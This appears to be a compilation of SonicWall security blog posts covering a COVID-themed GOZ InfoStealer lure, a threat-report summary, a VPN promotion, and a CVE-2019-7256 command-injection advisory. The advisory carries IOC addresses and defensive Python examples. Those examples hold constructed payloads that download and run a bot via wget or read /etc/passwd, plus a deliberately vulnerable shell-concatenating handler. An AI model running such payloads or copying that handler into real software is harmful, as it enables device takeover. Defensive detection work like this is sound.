Threat actors are misusing the coronavirus scare to spread a malicious executable

Today, everyone is aware of the deadly coronavirus (2019-nCoV) that was first reported from Wuhan, China, on 31 December 2019 and is now spreading worldwide. While the world is fighting this virus, running awareness campaigns and sharing documents on precautionary measures, cyber threat actors are treating the situation as an opportunity to profit from people's fear by distributing malware files disguised as coronavirus awareness documents. The SonicWall RTDMI™ engine recently detected an archive file containing an executable named "CoronaVirus_Safety_Measures.exe". The archive is delivered to the victim's machine as an email attachment:


After diving into the executable, we found that it belongs to the GOZ InfoStealer family, which the SonicWall RTDMI™ engine first detected on Nov 22, 2019.

"The GOZ InfoStealer is known for stealing user data from installed applications, along with the victim's system information, which is then sent to the threat actor over Simple Mail Transfer Protocol (SMTP)."

The malware author is continuously updating the malware code and changing its infection chain. The SonicWall Capture Labs Threat Research team continues to monitor the variants:

First Variant:

This variant uses image steganography as part of its infection chain and sends the stolen data to the malware author's email address over Simple Mail Transfer Protocol (SMTP).

Second Variant:

A JavaScript file is delivered to the victim's machine as an email attachment; it drops and executes the GOZ InfoStealer. The major change observed in this variant is that the malware author uses his own email address for both sending and receiving the stolen data.

Recent Variant:

An AutoIt compiled binary is delivered to the victim's machine inside an archive, as an email attachment, and executes the GOZ InfoStealer on the victim's machine. The AutoIt compiled binary is named "CoronaVirus_Safety_Measures.exe" to mislead the victim.
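As an added illustration (not SonicWall's detection logic and not code from the samples), the following Python script performs the static triage a mail gateway or an analyst could run on such an attachment: it opens the archive, flags members with executable extensions, double extensions, or a PE header hidden under a non-executable extension, and checks whether a PE embeds the "AU3!EA06" (or older "AU3!EA05") marker that AutoIt v3 compiled executables carry. The archive contents are constructed, harmless byte strings; apart from "CoronaVirus_Safety_Measures.exe", the member names and the lure keyword list are assumptions for the example.

```python
"""Static triage of a mail-attachment archive: lure names, executable members, AutoIt-compiled PEs.

Added example, not SonicWall's detection code. Assumes the attachment is a ZIP and that AutoIt v3
compiled executables carry an "AU3!EA06" (or older "AU3!EA05") marker somewhere in the image.
"""
import io
import os
import zipfile

AUTOIT_MARKERS = (b"AU3!EA06", b"AU3!EA05")
# Extensions Windows executes directly when a user opens them from the extracted archive.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".js", ".jse", ".vbs", ".vbe",
                         ".wsf", ".wsh", ".hta", ".bat", ".cmd", ".ps1", ".lnk", ".msi"}
# Extensions under which a PE image is expected; MZ data under anything else is a disguise.
PE_EXTENSIONS = {".exe", ".scr", ".dll", ".com", ".pif"}
# Filename fragments matching the lure theme (assumed list for this example).
LURE_KEYWORDS = ("coronavirus", "covid", "safety_measures", "wuhan")


def is_pe(data: bytes) -> bool:
    return data[:2] == b"MZ"


def is_autoit_compiled(data: bytes) -> bool:
    """True for a PE image that embeds an AutoIt v3 compiled-script marker."""
    return is_pe(data) and any(marker in data for marker in AUTOIT_MARKERS)


def triage_member(name: str, data: bytes) -> dict:
    """Score one archive member and list why it looks like an executable lure."""
    base = os.path.basename(name.replace("\\", "/"))
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    inner_ext = os.path.splitext(stem)[1].lower()        # ".pdf" in "update.pdf.exe"
    reasons = []
    if ext in EXECUTABLE_EXTENSIONS:
        reasons.append(f"executable extension {ext}")
        if inner_ext:
            reasons.append(f"double extension {inner_ext}{ext}")
    if is_pe(data) and ext not in PE_EXTENSIONS:
        reasons.append("PE header under a non-executable extension")
    if is_autoit_compiled(data):
        reasons.append("AutoIt-compiled binary")
    lure_name = any(key in base.lower() for key in LURE_KEYWORDS)
    return {"name": base, "size": len(data), "reasons": reasons,
            "lure_name": lure_name, "suspicious": bool(reasons)}


def triage_archive(blob: bytes) -> list:
    """Triage every file in a ZIP attachment held in memory."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return [triage_member(info.filename, zf.read(info))
                for info in zf.infolist() if not info.is_dir()]


def build_sample_archive() -> bytes:
    """Constructed fixture: harmless byte strings standing in for the attachment (not real malware)."""
    autoit_like = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 256 + b"AU3!EA06" + b"\x00" * 64
    plain_pe = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 256
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("CoronaVirus_Safety_Measures.exe", autoit_like)   # the lure named in the post
        zf.writestr("Coronavirus_Update.pdf.exe", plain_pe)           # assumed second member
        zf.writestr("Coronavirus_FAQ.txt", b"Wash your hands.\n")    # assumed benign member
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_archive(build_sample_archive()):
        tag = "SUSPICIOUS" if finding["suspicious"] else "ok"
        lure = " [lure name]" if finding["lure_name"] else ""
        print(f"{tag:10} {finding['name']}{lure}: {', '.join(finding['reasons']) or '-'}")
```

A lure-themed filename on its own is only a hint (the benign text file gets it too), so the script reports it separately and raises "suspicious" only on evidence about the file type. The AutoIt marker check is a cheap static tell; a packed or re-compiled sample can hide it, which is why a dynamic engine such as RTDMI is still needed behind the gateway.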

Evidence of the detection by the RTDMI engine can be seen below in the Capture ATP report for this file:


Additional Remark:

Please note that the RTDMI engine analyzed these samples and returned a verdict of 'Malicious' on February 04, 2020, as visible in the report:


Whereas the sample was first seen on VirusTotal 8 hours later, on February 05, 2020, as evident from the 'First Submission' date:


Inside Cybercriminal Inc.: SonicWall Exposes New Cyberattack Data, Threat Actor Behaviors in Latest Report

For cybercriminals and threat actors, the digital frontier is a lawless panorama of targets and opportunity. Despite the best intentions of government agencies, law enforcement and oversight groups, the modern cyber threat landscape is more agile and evasive than ever before.

For this reason, SonicWall Capture Labs threat researchers work tirelessly to arm organizations, enterprises, governments and businesses with actionable threat intelligence to stay ahead in the global cyber arms race.

And part of that dedication starts with the 2020 SonicWall Cyber Threat Report, which provides critical threat intelligence to help you better understand how cybercriminals think — and be fully prepared for what they’ll do next.

Global Malware Dips, But More Targeted

For the last five years, cybercriminals overwhelmed organizations with sheer volume. But as cyber defenses evolved, more volume was not resulting in higher paydays. A change was in order.

In 2018, cybercriminals began to leverage more evasive and pointed attacks against “softer” targets. In 2019, global malware volume dipped, but attacks were more targeted with higher degrees of success, particularly against the healthcare industry, and state, provincial and local governments.

All told, SonicWall Capture Labs threat researchers recorded 9.9 billion malware attacks* in 2019 — a slight 6% year-over-year decrease.

Ransomware targets state, provincial and local governments

‘Spray and pray’ is over. Cybercriminals are using ransomware to surgically target victims that are more likely to pay given the sensitive data they possess or funds at their disposal (or both). Now it’s all about ‘big-game hunting.’

The report outlines the most egregious ransomware attacks of 2019, while also painting a picture of the evolution of ransomware families and signatures, including Cerber, GandCrab, HiddenTear and more.

Fileless malware spikes in Q3

Fileless malware is malicious software that runs primarily as a memory-resident artifact (i.e., in RAM), typically by abusing legitimate tools already present on the system, and leaves little or nothing on the hard drive for disk-based forensics to recover. It is not invisible: memory capture and logging of script and process activity remain effective against it.

The use of fileless malware ebbed and flowed in 2019. But exclusive SonicWall data shows a massive mid-year spike for this savvy technique.

Encrypted threats growing consistently

Another year, another jump in the use of encrypted threats. Until more organizations proactively and responsibly inspect TLS/SSL traffic, this attack vector will only expand.

IoT malware volume rising

From hacked doorbell cameras to rogue nanny cams, 2019 was an alarming year for the security and privacy of IoT devices. Trending data suggests more IoT-based attacks are on the horizon.

Cryptojacking crumbles

In early 2019, the price of bitcoin and complementary cryptocurrencies created an untenable situation between Coinhive-based cryptojacking malware and the legitimate Coinhive mining service. The shuttering of the latter led to the virtual disappearance of one of the year's hottest malware families.

Coronavirus Affecting Business as Remote Workforces Expand Beyond Expected Capacity

The novel coronavirus epidemic is a major global health concern. To help prevent the spread of the new virus, organizations, businesses and enterprises are protecting their workforce and allowing employees to work remotely. This practice helps limit individual contact with large groups or crowds (e.g., restaurants, offices, transit) where viruses can easily spread.

As such, ‘stay at home’ is a common phrase in many health-conscious regions this week. According to the BBC, the city of Suzhou said businesses would remain closed until Feb 8, if not longer. As of 2018, Suzhou had a population of more than 10.7 million people.

On Jan. 30, the World Health Organization declared the outbreak a global health emergency. In response, the U.S. Department of State issued a Level 4 travel advisory for China (do not travel).

Precautions like these are causing unexpected increases in mobile workers; many organizations don't have enough virtual private network (VPN) licenses to accommodate the additional users. This is a serious risk: employees will either be unable to reach business resources or, worse, will reach them over unsecured connections.

Organizations and enterprises in affected areas should review their business continuity plans. The National Law Review published a useful primer for employers and organizations managing workforces susceptible to coronavirus outbreaks. In addition, leverage SonicWall's '5 Core Practices to Ensure Business Continuity.'

What is the coronavirus?

Coronavirus (2019-nCoV) is a respiratory illness first identified in Wuhan, China, but cases have since been reported in the U.S., Canada, Australia, Germany, France, Thailand, Japan, Hong Kong, and nine other countries. In an effort to contain the virus, the Chinese authorities have suspended air and rail travel in the area around Wuhan.

According to Centers for Disease Control and Prevention (CDC), early patients in the outbreak in China “reportedly had some link to a large seafood and animal market, suggesting animal-to-person spread. However, a growing number of patients reportedly have not had exposure to animal markets, indicating person-to-person spread is occurring. At this time, it’s unclear how easily or sustainably this virus is spreading between people.”

The latest situation summary updates are available via the CDC: 2019 Novel Coronavirus, Wuhan, China.


Work-from-Home VPN Solutions for Remote Workforces

To help organizations cost-effectively implement VPN technology for their rapidly expanding work-from-home employees, SonicWall is making its remote access products and services available to both new and existing customers via deeply discounted rates. We’re also bundling critical security solutions for new enterprise and SMB customers.

This special offer provides free Secure Mobile Access (SMA) virtual appliances sized for enterprises and SMBs, and also includes aggressive discounts on Cloud App Security and Capture Client endpoint protection when paired with SMA.

These packages were bundled to include everything needed to protect employees outside the network:

  • Free Secure Mobile Access (SMA) virtual appliance
  • Aggressive discounts on Capture Client endpoint protection
  • Aggressive discounts on Cloud App Security
  • Aggressive discounts on support contracts and Remote Implementation Services when you bundle a virtual appliance
  • New 30- and 60-day VPN spike licenses for existing SMA 100 and 1000 series customers

Linear eMerge E3 access controller actively being exploited

Linear eMerge E3:

Nortek Security & Control, LLC (NSC) is a leader in wireless security, home automation, and personal safety systems and devices. Its Linear eMerge E3 is an access controller that specifies which doors a person can use to enter and exit designated places at specified times. It runs an embedded Linux operating system and is managed from a browser through its embedded web server. These access systems are used by commercial, industrial, banking, medical, retail, hospitality, and other businesses that need to secure their facilities.

Vulnerability | CVE-2019-7256:

A command injection vulnerability has been reported in the eMerge E3-series access controller. The issue is caused by insufficient sanitizing of user-supplied input passed to a PHP function that invokes system commands, allowing arbitrary command execution with root privileges. A remote, unauthenticated attacker can exploit this by sending a crafted HTTP request.

Exploit:

The SonicWall Capture Labs Threat Research team observes a huge number of hits on our firewalls attempting to exploit this command injection vulnerability with the HTTP request below.

Once the vulnerability is exploited successfully on the target, the following shell commands will be executed on the target system:

The above shell commands are used to download the malware and execute it on the exploited systems.

The malware then accepts commands from its C2 server to conduct various types of DoS attacks against any given target.

Affected:

Linear eMerge Elite/Essential Firmware version 1.00-06

Impact:

As per Applied Risk's research report, a total of 2,375 Internet-accessible eMerge devices are listed by the Shodan search engine: 600 eMerge50P and 1,775 eMerge E3.

A quick search on Shodan exposes over 2,000 Linear devices.

An attacker can leverage an OS command injection vulnerability to alter or corrupt a database, steal customer records, launch distributed denial of service (DDoS) attacks or even compromise other parts of the hosting infrastructure. The resulting damage depends on the privileges of the process running the injected commands (root on this device) and on the security protections the organization has in place. In addition, attackers may retain access to the systems even after an organization has detected and fixed the underlying vulnerability.

Fix:
No patch is available yet.
Exploitation is known to be easy given the public proof-of-concept code: the attack can be launched remotely and no form of authentication is required.

Until a security patch is available, block access to the vulnerable PHP script (and keep the controller's web interface off the public Internet), or validate its inputs against a whitelist of permitted values.

After discovering that an OS command injection attack has taken place, it is critical to isolate the compromised systems from the internal networks. Because attackers may retain access after the vulnerability is fixed, a controller that was exposed should be treated as compromised and restored from known-good firmware rather than simply patched.
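To make the "whitelist of permitted values" advice concrete, here is an added Python stand-in (not Nortek's firmware and not the PHP script the advisory refers to) for the handler pattern it describes: a request parameter concatenated into a shell command. The parameter name "reader", the whitelist, the helper command and the injected payload are assumptions for the example; "echo" stands in for the privileged helper so the hardened path actually runs.

```python
"""Vulnerable vs. hardened handling of a request parameter that reaches a shell command.

Added example, not Nortek's firmware or the PHP script the advisory refers to: a Python stand-in
for the pattern it describes. The parameter name "reader", the whitelist and the helper command
are assumptions; "echo" stands in for the privileged helper so the example runs anywhere.
"""
import re
import subprocess

PERMITTED_READERS = {"1", "2", "3", "4"}   # the only values the endpoint legitimately accepts
HELPER = "echo"                             # stand-in for the privileged helper binary


def build_command_vulnerable(reader: str) -> str:
    """Deliberately vulnerable: the untrusted value is concatenated into a shell command string."""
    return f"{HELPER} {reader}"


def shell_would_run(cmdline: str) -> list:
    """Approximate how a POSIX shell breaks one command string into separate commands."""
    return [part.strip() for part in re.split(r";|&&|\|\||\||&", cmdline) if part.strip()]


def is_permitted(reader: str) -> bool:
    """Whitelist check: exact membership, not a blacklist of metacharacters."""
    return reader in PERMITTED_READERS


def build_command_hardened(reader: str) -> list:
    """Reject anything outside the whitelist, then build an argv list so no shell ever parses it."""
    if not is_permitted(reader):
        raise ValueError(f"rejected reader value: {reader!r}")
    return [HELPER, reader]


def run_hardened(reader: str) -> str:
    """Execute without shell=True; metacharacters inside argv elements are never interpreted."""
    return subprocess.run(build_command_hardened(reader), capture_output=True,
                          text=True, check=True).stdout.strip()


if __name__ == "__main__":
    # Constructed payload in the shape the Exploit section describes: download, chmod, execute.
    payload = "1; wget http://203.0.113.5/bot -O /tmp/bot; chmod +x /tmp/bot; /tmp/bot"
    print("vulnerable handler would run:")
    for cmd in shell_would_run(build_command_vulnerable(payload)):
        print("   ", cmd)
    print("hardened handler, same input:", "rejected" if not is_permitted(payload) else "accepted")
    print("hardened handler, valid input:", run_hardened("2"))
```

Two independent layers are shown on purpose: the whitelist stops the request at the door, and the argv list (no shell) means that even a value that slipped past validation could not become a second command. Quoting the value for a shell (escapeshellarg in PHP, shlex.quote in Python) is a weaker third option, because the attacker's string still reaches the helper as an argument.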

The SonicWall Capture Labs Threat Research team provides protection against this threat with the following signatures:

IPS: 14767 Linear eMerge Remote Code Execution

WAF: 9012 System Command Injection Variant 2

Heat Map:

Attackers seem to be actively targeting these devices: we see tens of thousands of hits every day, targeting over 100 countries, with the most attacks observed in the U.S.

Trend Chart:

IOC’s:

We do not find these IP addresses associated with any specific threat actor; most of them are seen crawling the Internet looking for vulnerable services and attempting to brute-force and exploit IoT devices. A good number of the attacks originate from compromised devices such as webcams or DVRs, which indicates infection with a Conficker- or Mirai-like malware variant.

121.138.83.147
220.92.153.250
195.223.173.102
88.61.0.93
62.86.25.151
217.58.35.193
195.103.133.46
80.22.178.53
80.21.75.143
221.157.203.236
94.89.40.90
80.22.8.239
62.86.6.98
5.96.237.174
82.191.134.50
88.57.72.14
88.32.72.110
88.44.33.170
31.197.102.187
62.86.211.49
88.42.32.78
94.81.7.43
37.205.159.206
62.86.203.177
217.58.61.49
82.185.94.187
88.34.126.169
80.19.160.157
212.131.13.41
217.141.242.114
85.33.36.165
85.33.39.225
194.243.255.230
82.189.198.34
80.17.57.197
5.97.218.186
151.11.117.230
2.112.35.46
94.91.166.163
2.113.121.141
80.18.113.223
217.58.167.45
212.131.143.250
88.58.46.118
31.199.241.17
37.205.207.125
79.3.199.89
80.22.20.166
94.94.226.54
217.58.149.69
88.34.126.171
88.44.33.166
80.21.229.186
66.76.142.242
31.196.187.61
203.158.18.80
85.35.30.58
94.80.117.38
2.194.70.9
2.194.70.202
80.21.170.254
45.58.123.178
37.207.247.58
2.194.70.232
45.56.97.236
190.115.18.86
213.26.141.26
2.194.65.36
2.194.65.46
95.210.74.80
52.2.194.128
198.210.24.5
147.75.226.58
107.162.6.45
52.55.228.83
18.211.74.2
94.94.194.46
18.213.94.236
95.210.74.90
89.25.34.37
3.218.66.165
165.100.216.29
209.124.44.10
2.194.65.101
196.250.8.153
193.169.82.20
80.239.119.247
80.95.0.73
107.162.6.99
89.39.60.121
45.125.10.132
177.131.116.13
18.195.232.15
107.162.6.18
34.196.8.195
2.194.65.221
34.230.216.5
175.101.19.169
3.227.113.46
184.185.45.254
107.162.6.48
89.25.34.39
213.249.131.209
52.44.57.241
94.135.234.240
198.210.17.1
54.214.32.228
45.6.63.145
182.71.249.209
2.194.73.156
179.95.237.242
193.182.183.2
98.159.149.189
103.62.95.165
2.194.67.115
3.214.34.155
192.50.2.1
120.79.16.234
213.27.197.196
2.194.71.224
50.240.171.85
107.162.6.49
3.220.141.26
95.210.74.108
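The following added Python example (not a SonicWall IPS or WAF signature, and not code from this post) shows how a defender could spot the exploitation traffic described in the Exploit section in a web-server access log and cross-check source addresses against the IOC list above. The log lines are constructed; "/controller.php" and its "no" parameter are placeholder names, not the real vulnerable script; IOC_IPS is a five-address subset of the list above.

```python
"""Access-log detection of command-injection attempts plus IOC source-address matching.

Added example, not a SonicWall IPS/WAF signature. The log lines are constructed; "/controller.php"
and its "no" parameter are placeholders, not the real vulnerable script; IOC_IPS is a subset of
the addresses listed in the post.
"""
import re
from urllib.parse import unquote_plus, urlsplit

IOC_IPS = {"121.138.83.147", "220.92.153.250", "195.223.173.102", "88.61.0.93", "62.86.25.151"}

# Common/combined log format as written by most embedded web servers.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')
SHELL_META = re.compile(r"[;|&`\n]|\$\(|\$\{")        # command separators and substitution
DOWNLOAD_EXEC = re.compile(r"(wget|curl|tftp|ftpget)\b.*(chmod\s|/tmp/|/var/tmp/|\bsh\s)",
                           re.I | re.S)

# Constructed sample log: one download-and-execute injection, one benign request,
# one pipe-based injection from a non-IOC address, one benign request from an IOC address.
SAMPLE_LOG = """\
121.138.83.147 - - [05/Feb/2020:10:12:01 +0000] "GET /controller.php?no=1;wget%20http://198.51.100.7/x.sh%20-O%20/tmp/x.sh;sh%20/tmp/x.sh HTTP/1.1" 200 512
203.0.113.9 - - [05/Feb/2020:10:12:05 +0000] "GET /controller.php?no=2 HTTP/1.1" 200 512
203.0.113.9 - - [05/Feb/2020:10:13:40 +0000] "GET /controller.php?no=2%7Ccat%20/etc/passwd HTTP/1.1" 200 512
88.61.0.93 - - [05/Feb/2020:10:14:02 +0000] "GET /login.php HTTP/1.1" 200 1024
"""


def parse_line(line: str):
    """Return the request fields of one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decoded_query_segments(target: str) -> list:
    """Split the raw query on '&' before decoding, so an encoded %26 inside a value stays there."""
    query = urlsplit(target).query
    return [unquote_plus(seg) for seg in query.split("&") if seg]


def analyse(line: str) -> dict:
    rec = parse_line(line)
    if rec is None:
        return {"parsed": False, "line": line, "reasons": [], "alert": False}
    reasons = []
    if rec["ip"] in IOC_IPS:
        reasons.append("source IP in IOC list")
    segments = decoded_query_segments(rec["target"])
    if any(SHELL_META.search(seg) for seg in segments):
        reasons.append("shell metacharacters in query")
    if DOWNLOAD_EXEC.search(" ".join(segments)):
        reasons.append("download-and-execute chain")
    # An IOC hit alone marks a known scanner; only injection evidence raises an alert.
    alert = any(r != "source IP in IOC list" for r in reasons)
    return {"parsed": True, "ip": rec["ip"], "path": urlsplit(rec["target"]).path,
            "status": rec["status"], "reasons": reasons, "alert": alert}


def scan(log_text: str) -> list:
    return [analyse(line) for line in log_text.splitlines() if line.strip()]


if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        tag = "ALERT" if r["alert"] else ("info " if r["reasons"] else "ok   ")
        print(tag, r.get("ip"), r.get("path"), "; ".join(r["reasons"]) or "-")
```

The decode step matters: the metacharacters arrive percent-encoded in the request line, so matching the raw log text would miss "%7C" and "%0a". Splitting on "&" before decoding keeps an encoded ampersand inside the value it was smuggled in, where it is itself a strong signal. An IOC address on its own is logged as information rather than an alert, in line with the remark above that these sources are indiscriminate scanners rather than a specific actor.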